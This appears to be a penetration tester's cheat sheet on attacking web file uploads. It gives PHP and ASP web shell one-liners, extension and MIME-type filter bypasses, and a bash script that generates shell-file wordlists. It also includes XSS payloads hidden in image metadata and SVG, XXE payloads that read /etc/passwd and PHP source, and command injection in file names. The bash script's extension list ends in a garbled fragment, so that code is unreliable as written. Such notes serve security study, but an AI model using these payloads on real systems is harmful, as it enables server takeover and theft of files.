4. File Upload

Web Shells

Resources

https://github.com/Arrexel/phpbash
https://github.com/danielmiessler/SecLists/tree/master/Web-Shells
https://github.com/pentestmonkey/php-reverse-shell
https://github.com/danielmiessler/SecLists/tree/master/Web-Shells

php one liner

<?php system ($_REQUEST['cmd']); ?>

ASP oneliner

<%eval request('cmd') %>

Bypass Client-Side Validation

1.Change file extension from Burp
2. Change HTML code from developer mode
1. [CTRL+SHIFT+C] --> Page Inspector
2. Then do [CTRL+SHIFT+K] to check the code.

Blacklist

  1. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload Insecure Files/Extension PHP/extensions.lst
  2. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload Insecure Files/Extension ASP
  3. https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
  4. Upload a file
  5. Locate the file
  6. Fuzz (identify acceptable extension)

Whitelist

  1. FUZZ
  2. Double extensions
    1. .jpg.php
  3. Reverse Double Extension
    1. .php.jpg
  4. Character Injection
%20
%0a
%00
%0d0a
/
.\
.
…
:

Bash script to

#!/bin/bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps' '.phar' '.php7' '.pht' '.pht' '.phtml' '.shtml '****; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done

Type Filters

  1. FUZZ Content-Type Header
$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/web/content-type.txt

$ cat content-type.txt | grep 'image/' > image-content-types.txt
  1. MIME -Filter
    https://en.wikipedia.org/wiki/List_of_file_signatures
    https://opensource.apple.com/source/file/file-23/file/magic/magic.mime
    Add first few bytes.

Limited File Uploads

Stored XSS - metadata

For Web application that displays metadata,
Append comment section of an image.


$ exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg

$ exiftool HTB.jpg

XSS-Scalable Vector Graphics

What is SVG? : XML-based images which describe 2D vector. Browser renders into an image.

Create svg in XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

XXE

What is XXE?
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>


# on PHP server

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

Injections in File Name

e.g.
file$(whoami).jpg 
file`whoami`.jpg
file.jpg||whoami
 <script>alert(window.origin);</script>

Upload Directory Disclosure

Search for Upload directory.

Windows-Specific Attacks

https://en.wikipedia.org/wiki/8.3_filename
image/jpeg
image/png
image/svc+xml